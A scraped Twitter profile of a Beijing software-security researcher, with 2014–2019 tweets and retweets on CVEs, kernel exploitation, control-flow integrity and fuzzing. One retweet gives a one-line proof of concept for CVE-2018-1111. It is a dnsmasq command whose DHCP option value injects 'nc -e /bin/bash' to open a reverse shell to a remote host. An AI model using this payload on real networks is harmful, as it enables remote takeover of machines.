wei wu

@wu_xiao_wei

Focus on Software security

Beijing
Vrijeme pridruživanja: rujan 2014.

Tweetovi

Blokirali ste korisnika/cu @wu_xiao_wei

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @wu_xiao_wei

  1. proslijedio/la je Tweet
    9. ruj 2019.

    CVE-2019-16137, CVE-2019-16138, <-- UAF CVE-2019-16139, <-- OOB R/W CVE-2019-16140, <-- UAF CVE-2019-16141, CVE-2019-16142, CVE-2019-16143, CVE-2019-16144, <-- Uninit memory "but, but, but just use Rust!" 😂🤣🤣🤣

    Poništi
  2. proslijedio/la je Tweet
    7. ruj 2018.

    iOS 12 beta 12 pwned. (Kernel Memory R/W) with and - WE DID IT 💥

    Poništi
  3. proslijedio/la je Tweet
    15. svi 2018.

    -2018-1111 tweetable PoC :) dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc:

    Poništi
  4. 9. kol 2018.

    Our talk is this afternoon 2:30 at Islander FG, I will be talking about linux kernel vulnerabilities, I will introduce challenges and propose our technique, demonstrate its utility against real world vuls.

    Poništi
  5. proslijedio/la je Tweet
    29. pro 2016.

    Nobody solved my recurse challenge. Solution was triggering a vfork+exit and then a bit heap-fu. Writeup:

    Poništi
  6. proslijedio/la je Tweet
    27. ožu 2016.

    A nice prezo by on his great GUI engine and the benefit of making custom tools

    Poništi
  7. proslijedio/la je Tweet
    10. pro 2014.

    So Windows 8.1 Update already is 'CFG-Aware' and enforces Control Flow integrity via CF info written in PE files by VS2015

    Poništi
  8. proslijedio/la je Tweet
    20. pro 2014.

    Metasploit module for Git CVE-2014-9360 ( ). Want mercurial support?

    Poništi
  9. proslijedio/la je Tweet
    21. pro 2014.

    几年前cfi还没出来的时候曾经有一次争论,虽然没有看到产品但是我说我就能破,作者根本不相信,因为他也是漏洞利用方面的专家,非常清楚传统的漏洞利用办法,最后都要有一个跳转控制的过程。但是我十多年前总结得出的是“安全是一个条件语句”,除了改变条件后的执行指令外还可以改变条件得到控制。

    Poništi
  10. proslijedio/la je Tweet
    10. stu 2014.

    New VB2014 paper: Apple without a shell - iOS under targeted attack

    Poništi
  11. proslijedio/la je Tweet
    17. pro 2014.

    What is best in life? To crush your CPUs, to see them driven before you, and to hear the lamentations of the kernel.

    Poništi
  12. proslijedio/la je Tweet
    1. pro 2014.

    22 videos and slides have been released! Sorry for the extra "t" on the last tweet (which I shall delete!)

    Poništi
  13. proslijedio/la je Tweet
    1. pro 2014.

    showing us the future of SDN exchanges!

    Poništi
  14. proslijedio/la je Tweet
    1. pro 2014.

    Develop fuzzers & run them against target software w/ Training “Fuzzing for Vulnerabilities”

    Poništi
  15. proslijedio/la je Tweet
    4. pro 2014.
    Poništi
  16. proslijedio/la je Tweet
    4. pro 2014.

    A great (and free) anti-APT service brought to you by Way to go, guys!

    Poništi
  17. 24. lis 2014.

    On the Feasibility of Large-Scale Infections of iOS Devices: 来自

    Poništi
  18. proslijedio/la je Tweet
    7. lis 2014.

    Executed my first time OSX kernel SC via CVE-2014-4404 by Ian Beer from Google Zero. Works great on the latest OSX!

    Poništi
  19. proslijedio/la je Tweet
    3. lis 2014.

    A nice write-up of all the shellshock exploitation methods currently happening:

    Poništi
  20. proslijedio/la je Tweet
    4. lis 2014.

    How an APT might circumvent the Pre-Processing, Emulation and Heuristic Detection steps of EBNIDSes - Briefing

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·